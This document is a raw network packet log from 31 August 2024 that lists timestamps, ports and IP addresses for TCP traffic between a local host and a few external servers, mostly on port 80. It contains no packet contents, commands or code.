Aug 31, 2024 15:44:20.786726952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.786735058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786746025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786756992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786766052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.786776066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.786776066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.786796093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.786828041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787518978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787558079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787566900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787604094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787616014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787627935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787631035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787631035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787640095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787651062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787671089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787748098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787759066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787769079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787777901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787779093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787789106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787798882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787806034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787817001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787827015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787833929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787838936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.787842989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.787867069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788093090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788124084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788199902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788212061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788228035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788232088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788244009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788259983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788264036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788268089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788275957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788288116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788292885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788299084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788309097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788317919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788319111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788332939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788350105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788357019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788358927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788373947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788386106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788389921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788397074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788408041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788417101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788418055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788417101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788429022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788439035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788441896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788454056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788455963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788469076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788486004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788486958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788501024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788537979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788537979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788567066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788597107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788606882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788628101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788660049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788670063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788678885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788688898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788696051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788702011 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.788712978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.788733006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.789180040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789190054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789201975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789206028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.789251089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789262056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789272070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789280891 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.789284945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.789297104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.789329052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.790189028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793183088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793205023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793219090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793230057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793243885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793255091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793265104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793273926 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793308020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793329000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793340921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793350935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793392897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793431044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793431044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793523073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793543100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793555021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793565989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793576002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793577909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793626070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793627024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.793956041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793967009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793984890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.793997049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.794007063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.794018030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.794027090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.794032097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.794071913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.794071913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.794137955 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794150114 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794159889 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794214010 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.794214010 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.794347048 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794357061 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794368029 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.794390917 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.794652939 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.797483921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797494888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797513962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797524929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797540903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797554016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797564030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797569036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797574997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797586918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797605991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797621965 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797631979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797633886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797633886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797637939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797710896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797720909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797729969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797739029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797746897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797749043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.797759056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797772884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.797833920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799120903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799186945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799196005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799252033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799256086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799256086 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799262047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799273014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799283028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799293995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799304008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799333096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799333096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799523115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799535036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799544096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799554110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799563885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799581051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799581051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799591064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799599886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.799611092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799611092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799650908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.799664021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.822288990 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:20.827121019 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827218056 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827230930 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827318907 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827359915 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827394009 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827408075 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827445984 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827455997 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827464104 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827481031 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827488899 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827497005 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827507019 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.827697039 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.842277050 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.842287064 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.842297077 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.842701912 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.875901937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.875914097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.875925064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.876003981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.876003981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.876035929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.876046896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.876056910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.876070023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.876085997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.876085997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.876133919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.877382040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877393007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877403021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877454996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.877454996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.877538919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877549887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877559900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877569914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.877600908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.877661943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878340960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878353119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878364086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878372908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878385067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878395081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878401041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878427982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878427982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878487110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878499031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878509998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878518105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878523111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878532887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878544092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878549099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878556967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878571987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878585100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878757954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878757954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878765106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878776073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878796101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878806114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878808975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878818035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878823996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878830910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878839970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878839970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878849030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878869057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878870964 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878879070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878894091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878896952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878900051 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878909111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878917933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878928900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878930092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878942013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.878943920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.878957987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879008055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879043102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879053116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879062891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879115105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879115105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879187107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879196882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879206896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879216909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879251003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879338026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879347086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879359961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879375935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879384995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879395008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879404068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879412889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879412889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879412889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879426956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879426956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879456997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879456997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879867077 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879875898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879887104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879914999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879935980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879946947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879956007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879962921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879966974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.879997015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.879997015 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.880033016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.883786917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883805037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883882046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.883917093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883927107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883935928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883945942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883965015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883974075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883984089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.883985996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.883992910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884005070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.884011984 CEST	49727	80	192.168.2.5	52.212.52.84
